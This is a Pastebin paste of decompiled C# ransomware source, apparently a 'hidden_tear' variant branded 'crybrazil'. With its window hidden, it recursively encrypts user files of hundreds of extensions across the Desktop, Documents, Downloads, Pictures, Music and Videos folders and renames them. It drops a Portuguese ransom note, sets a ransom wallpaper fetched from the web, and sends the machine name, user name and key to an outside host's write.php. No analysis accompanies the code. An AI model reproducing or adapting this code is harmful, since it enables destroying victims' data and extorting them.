API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 9th, 2018
413
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.08 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.ComponentModel;
  3. using System.Diagnostics;
  4. using System.Drawing;
  5. using System.IO;
  6. using System.Linq;
  7. using System.Net;
  8. using System.Runtime.InteropServices;
  9. using System.Security.Cryptography;
  10. using System.Text;
  11. using System.Windows.Forms;
  12.  
  13. namespace hidden_tear
  14. {
  15. // Token: 0x02000002 RID: 2
  16. public class Form1 : Form
  17. {
  18. // Token: 0x06000001 RID: 1
  19. [DllImport("user32.dll", CharSet = CharSet.Auto)]
  20. private static extern int SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
  21.  
  22. // Token: 0x06000002 RID: 2 RVA: 0x000020E0 File Offset: 0x000002E0
  23. public Form1()
  24. {
  25. this.InitializeComponent();
  26. }
  27.  
  28. // Token: 0x06000003 RID: 3 RVA: 0x00002058 File Offset: 0x00000258
  29. private void Form1_Load(object sender, EventArgs e)
  30. {
  31. base.Opacity = 0.0;
  32. base.ShowInTaskbar = false;
  33. this.startAction();
  34. }
  35.  
  36. // Token: 0x17000001 RID: 1
  37. // (get) Token: 0x06000004 RID: 4 RVA: 0x0000213C File Offset: 0x0000033C
  38. protected override CreateParams CreateParams
  39. {
  40. get
  41. {
  42. CreateParams createParams = base.CreateParams;
  43. createParams.ExStyle |= 128;
  44. return createParams;
  45. }
  46. }
  47.  
  48. // Token: 0x06000005 RID: 5 RVA: 0x00002076 File Offset: 0x00000276
  49. private void Form_Shown(object sender, EventArgs e)
  50. {
  51. base.Visible = false;
  52. base.Opacity = 100.0;
  53. }
  54.  
  55. // Token: 0x06000006 RID: 6 RVA: 0x00002168 File Offset: 0x00000368
  56. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
  57. {
  58. byte[] result = null;
  59. byte[] salt = new byte[]
  60. {
  61. 1,
  62. 2,
  63. 3,
  64. 4,
  65. 5,
  66. 6,
  67. 7,
  68. 8
  69. };
  70. using (MemoryStream memoryStream = new MemoryStream())
  71. {
  72. using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
  73. {
  74. rijndaelManaged.KeySize = 256;
  75. rijndaelManaged.BlockSize = 128;
  76. Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
  77. rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
  78. rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
  79. rijndaelManaged.Mode = CipherMode.CBC;
  80. using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
  81. {
  82. cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
  83. cryptoStream.Close();
  84. }
  85. result = memoryStream.ToArray();
  86. }
  87. }
  88. return result;
  89. }
  90.  
  91. // Token: 0x06000007 RID: 7 RVA: 0x00002270 File Offset: 0x00000470
  92. public string CreatePassword(int length)
  93. {
  94. StringBuilder stringBuilder = new StringBuilder();
  95. Random random = new Random();
  96. while (0 < length--)
  97. {
  98. stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]);
  99. }
  100. return stringBuilder.ToString();
  101. }
  102.  
  103. // Token: 0x06000008 RID: 8 RVA: 0x000022C0 File Offset: 0x000004C0
  104. public void SendPassword(string password)
  105. {
  106. try
  107. {
  108. string str = string.Concat(new string[]
  109. {
  110. this.computerName,
  111. "-",
  112. this.userName,
  113. " ",
  114. password
  115. });
  116. string address = this.targetURL + str;
  117. new WebClient().DownloadString(address);
  118. }
  119. catch (Exception)
  120. {
  121. }
  122. }
  123.  
  124. // Token: 0x06000009 RID: 9 RVA: 0x00002330 File Offset: 0x00000530
  125. public void EncryptFile(string file, string password)
  126. {
  127. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
  128. byte[] array = Encoding.UTF8.GetBytes(password);
  129. array = SHA256.Create().ComputeHash(array);
  130. byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array);
  131. string str = "Users\\";
  132. string str2 = str + this.userName + "\\Desktop\\SUA_CHAVE.html.hacked";
  133. string path = this.userDir + str2;
  134. if (File.Exists(path))
  135. {
  136. File.Delete(path);
  137. }
  138. File.WriteAllBytes(file, bytes);
  139. File.Move(file, file + ".crybrazil");
  140. }
  141.  
  142. // Token: 0x0600000A RID: 10 RVA: 0x000023B8 File Offset: 0x000005B8
  143. public void encryptDirectory(string location, string password)
  144. {
  145. try
  146. {
  147. string[] source = new string[]
  148. {
  149. ".dat",
  150. ".keychain",
  151. ".sdf",
  152. ".vcf",
  153. ".jpg",
  154. ".png",
  155. ".tiff",
  156. ".tif",
  157. ".gif",
  158. ".jpeg",
  159. ".jif",
  160. ".jfif",
  161. ".jp2",
  162. ".jpx",
  163. ".j2k",
  164. ".j2c",
  165. ".fpx",
  166. ".pcd",
  167. ".bmp",
  168. ".svg",
  169. ".3dm",
  170. ".3ds",
  171. ".max",
  172. ".obj",
  173. ".dds",
  174. ".psd",
  175. ".tga",
  176. ".thm",
  177. ".yuv",
  178. ".ai",
  179. ".eps",
  180. ".ps",
  181. ".indd",
  182. ".pct",
  183. ".mp4",
  184. ".avi",
  185. ".mkv",
  186. ".3g2",
  187. ".3gp",
  188. ".asf",
  189. ".flv",
  190. ".m4v",
  191. ".mov",
  192. ".mpg",
  193. ".rm",
  194. ".srt",
  195. ".swf",
  196. ".vob",
  197. ".wmv",
  198. ".doc",
  199. ".docx",
  200. ".txt",
  201. ".pdf",
  202. ".log",
  203. ".msg",
  204. ".odt",
  205. ".pages",
  206. ".rtf",
  207. ".tex",
  208. ".wpd",
  209. ".wps",
  210. ".csv",
  211. ".ged",
  212. ".key",
  213. ".pps",
  214. ".ppt",
  215. ".pptx",
  216. ".xml",
  217. ".json",
  218. ".xlsx",
  219. ".xlsm",
  220. ".xlsb",
  221. ".xls",
  222. ".mht",
  223. ".mhtml",
  224. ".htm",
  225. ".html",
  226. ".xltx",
  227. ".prn",
  228. ".dif",
  229. ".slk",
  230. ".xlam",
  231. ".xla",
  232. ".ods",
  233. ".docm",
  234. ".dotx",
  235. ".dotm",
  236. ".xps",
  237. ".ics",
  238. ".mp3",
  239. ".aif",
  240. ".iff",
  241. ".m3u",
  242. ".m4a",
  243. ".mid",
  244. ".mpa",
  245. ".wav",
  246. ".wma",
  247. ".msi",
  248. ".php",
  249. ".apk",
  250. ".app",
  251. ".bat",
  252. ".cgi",
  253. ".com",
  254. ".asp",
  255. ".aspx",
  256. ".cer",
  257. ".cfm",
  258. ".css",
  259. ".js",
  260. ".jsp",
  261. ".rss",
  262. ".xhtml",
  263. ".c",
  264. ".class",
  265. ".cpp",
  266. ".cs",
  267. ".h",
  268. ".java",
  269. ".lua",
  270. ".pl",
  271. ".py",
  272. ".sh",
  273. ".sln",
  274. ".swift",
  275. ".vb",
  276. ".vcxproj",
  277. ".dem",
  278. ".gam",
  279. ".nes",
  280. ".rom",
  281. ".sav",
  282. ".tgz",
  283. ".zip",
  284. ".rar",
  285. ".tar",
  286. ".7z",
  287. ".cbr",
  288. ".deb",
  289. ".gz",
  290. ".pkg",
  291. ".rpm",
  292. ".zipx",
  293. ".iso",
  294. ".accdb",
  295. ".db",
  296. ".dbf",
  297. ".mdb",
  298. ".sql",
  299. ".fnt",
  300. ".fon",
  301. ".otf",
  302. ".ttf",
  303. ".cfg",
  304. ".prf",
  305. ".bak",
  306. ".old",
  307. ".tmp",
  308. ".torrent",
  309. ".der",
  310. ".pfx",
  311. ".crt",
  312. ".csr",
  313. ".p12",
  314. ".pem",
  315. ".ott",
  316. ".sxw",
  317. ".stw",
  318. ".uot",
  319. ".ots",
  320. ".sxc",
  321. ".stc",
  322. ".wb2",
  323. ".odp",
  324. ".otp",
  325. ".sxd",
  326. ".std",
  327. ".uop",
  328. ".odg",
  329. ".otg",
  330. ".sxm",
  331. ".mml",
  332. ".lay",
  333. ".lay6",
  334. ".asc",
  335. ".sqlite3",
  336. ".sqlitedb",
  337. ".odb",
  338. ".frm",
  339. ".myd",
  340. ".myi",
  341. ".ibd",
  342. ".mdf",
  343. ".ldf",
  344. ".suo",
  345. ".pas",
  346. ".asm",
  347. ".cmd",
  348. ".ps1",
  349. ".vbs",
  350. ".dip",
  351. ".dch",
  352. ".sch",
  353. ".brd",
  354. ".rb",
  355. ".jar",
  356. ".fla",
  357. ".mpeg",
  358. ".m4u",
  359. ".djvu",
  360. ".nef",
  361. ".cgm",
  362. ".raw",
  363. ".vcd",
  364. ".backup",
  365. ".tbk",
  366. ".bz2",
  367. ".PAQ",
  368. ".aes",
  369. ".gpg",
  370. ".vmx",
  371. ".vmdk",
  372. ".vdi",
  373. ".sldm",
  374. ".sldx",
  375. ".sti",
  376. ".sxi",
  377. ".602",
  378. ".hwp",
  379. ".edb",
  380. ".potm",
  381. ".potx",
  382. ".ppam",
  383. ".ppsx",
  384. ".ppsm",
  385. ".pot",
  386. ".pptm",
  387. ".xltm",
  388. ".xlc",
  389. ".xlm",
  390. ".xlt",
  391. ".xlw",
  392. ".dot",
  393. ".docb",
  394. ".snt",
  395. ".onetoc2",
  396. ".dwg",
  397. ".wk1",
  398. ".wks",
  399. ".123",
  400. ".vsdx",
  401. ".vsd",
  402. ".eml",
  403. ".ost",
  404. ".pst"
  405. };
  406. string[] files = Directory.GetFiles(location);
  407. string[] directories = Directory.GetDirectories(location);
  408. for (int i = 0; i < files.Length; i++)
  409. {
  410. string extension = Path.GetExtension(files[i]);
  411. if (source.Contains(extension))
  412. {
  413. this.EncryptFile(files[i], password);
  414. }
  415. }
  416. for (int i = 0; i < directories.Length; i++)
  417. {
  418. this.encryptDirectory(directories[i], password);
  419. }
  420. }
  421. catch (Exception)
  422. {
  423. }
  424. }
  425.  
  426. // Token: 0x0600000B RID: 11 RVA: 0x00002FC8 File Offset: 0x000011C8
  427. public void MoveVirus()
  428. {
  429. string path = this.userDir + this.userName + "\\Rand123";
  430. string text = this.userDir + this.userName + "\\Rand123\\local.exe";
  431. if (!Directory.Exists(path))
  432. {
  433. Directory.CreateDirectory(path);
  434. }
  435. else if (File.Exists(text))
  436. {
  437. File.Delete(text);
  438. }
  439. string str = "\\" + Process.GetCurrentProcess().ProcessName + ".exe";
  440. string text2 = Directory.GetCurrentDirectory() + str;
  441. string sourceFileName = text2;
  442. File.Move(sourceFileName, text);
  443. }
  444.  
  445. // Token: 0x0600000C RID: 12 RVA: 0x00003058 File Offset: 0x00001258
  446. public static bool CheckForInternetConnection()
  447. {
  448. bool result;
  449. try
  450. {
  451. using (WebClient webClient = new WebClient())
  452. {
  453. using (webClient.OpenRead("https://www.google.fr"))
  454. {
  455. result = true;
  456. }
  457. }
  458. }
  459. catch
  460. {
  461. result = false;
  462. }
  463. return result;
  464. }
  465.  
  466. // Token: 0x0600000D RID: 13 RVA: 0x000030C4 File Offset: 0x000012C4
  467. public void startAction()
  468. {
  469. string password = "AA151257B1462D642E7E21FF9C80F83CAF043C3572D5ED59BD283D20641E3C9D";
  470. this.MoveVirus();
  471. this.Directory_Settings_Sending(password);
  472. this.messageCreator();
  473. string path = this.userDir + this.userName + "\\ranso4.jpg";
  474. bool flag;
  475. do
  476. {
  477. if (flag = Form1.CheckForInternetConnection())
  478. {
  479. this.SetWallpaperFromWeb(this.backgroundImageUrl, path);
  480. this.SendPassword(password);
  481. }
  482. }
  483. while (!flag);
  484. Application.Exit();
  485. }
  486.  
  487. // Token: 0x0600000E RID: 14 RVA: 0x00003138 File Offset: 0x00001338
  488. public void Directory_Settings_Sending(string password)
  489. {
  490. string str = "Users\\";
  491. string location = this.userDir + str + this.userName + "\\Desktop";
  492. string location2 = this.userDir + str + this.userName + "\\Documents";
  493. string location3 = this.userDir + str + this.userName + "\\Downloads";
  494. string location4 = this.userDir + str + this.userName + "\\Pictures";
  495. string location5 = this.userDir + str + this.userName + "\\Music";
  496. string location6 = this.userDir + str + this.userName + "\\Videos";
  497. this.encryptDirectory(location, password);
  498. this.encryptDirectory(location2, password);
  499. this.encryptDirectory(location3, password);
  500. this.encryptDirectory(location4, password);
  501. this.encryptDirectory(location5, password);
  502. this.encryptDirectory(location6, password);
  503. }
  504.  
  505. // Token: 0x0600000F RID: 15 RVA: 0x00003214 File Offset: 0x00001414
  506. public void messageCreator()
  507. {
  508. string str = "\\Desktop\\SUA_CHAVE.html";
  509. string path = this.userDir + "Users\\" + this.userName + str;
  510. this.computerName + "-" + this.userName;
  511. string[] contents = new string[]
  512. {
  513. "<a href= 'http://3e24c23r2213122c1cxdsxsd.unaux.com' target='_blank'<H3>O QUE ESTÁ ACONTECENDO?</H3></a>"
  514. };
  515. File.WriteAllLines(path, contents);
  516. }
  517.  
  518. // Token: 0x06000010 RID: 16 RVA: 0x0000208E File Offset: 0x0000028E
  519. public void SetWallpaper(string path)
  520. {
  521. Form1.SystemParametersInfo(20u, 0u, path, 3u);
  522. }
  523.  
  524. // Token: 0x06000011 RID: 17 RVA: 0x00003274 File Offset: 0x00001474
  525. private void SetWallpaperFromWeb(string url, string path)
  526. {
  527. try
  528. {
  529. WebClient webClient = new WebClient();
  530. webClient.DownloadFile(new Uri(url), path);
  531. this.SetWallpaper(path);
  532. }
  533. catch (Exception)
  534. {
  535. }
  536. }
  537.  
  538. // Token: 0x06000012 RID: 18 RVA: 0x000032B4 File Offset: 0x000014B4
  539. protected override void Dispose(bool disposing)
  540. {
  541. if (disposing && this.components != null)
  542. {
  543. this.components.Dispose();
  544. }
  545. base.Dispose(disposing);
  546. }
  547.  
  548. // Token: 0x06000013 RID: 19 RVA: 0x000032E4 File Offset: 0x000014E4
  549. private void InitializeComponent()
  550. {
  551. ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(Form1));
  552. base.SuspendLayout();
  553. base.AutoScaleDimensions = new SizeF(6f, 13f);
  554. base.AutoScaleMode = AutoScaleMode.Font;
  555. base.ClientSize = new Size(124, 53);
  556. base.Icon = (Icon)componentResourceManager.GetObject("$this.Icon");
  557. base.Name = "Form1";
  558. this.Text = "projet";
  559. base.Load += this.Form1_Load;
  560. base.ResumeLayout(false);
  561. }
  562.  
  563. // Token: 0x04000001 RID: 1
  564. private string targetURL = "http://3e24c23r2213122c1cxdsxsd.unaux.com/crybrazil/write.php?info=";
  565.  
  566. // Token: 0x04000002 RID: 2
  567. private string userName = Environment.UserName;
  568.  
  569. // Token: 0x04000003 RID: 3
  570. private string computerName = Environment.MachineName.ToString();
  571.  
  572. // Token: 0x04000004 RID: 4
  573. private string userDir = "C:\\";
  574.  
  575. // Token: 0x04000005 RID: 5
  576. private string backgroundImageUrl = "http://4.bp.blogspot.com/-11m8rWaFmWs/WuhochGTK0I/AAAAAAAAFTY/VkbbVhxYZDgW_jlbQ5lPbV8AEhyd4ihgQCK4BGAYYCw/s1600/ranso4.jpg";
  577.  
  578. // Token: 0x04000006 RID: 6
  579. private IContainer components = null;
  580. }
  581. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!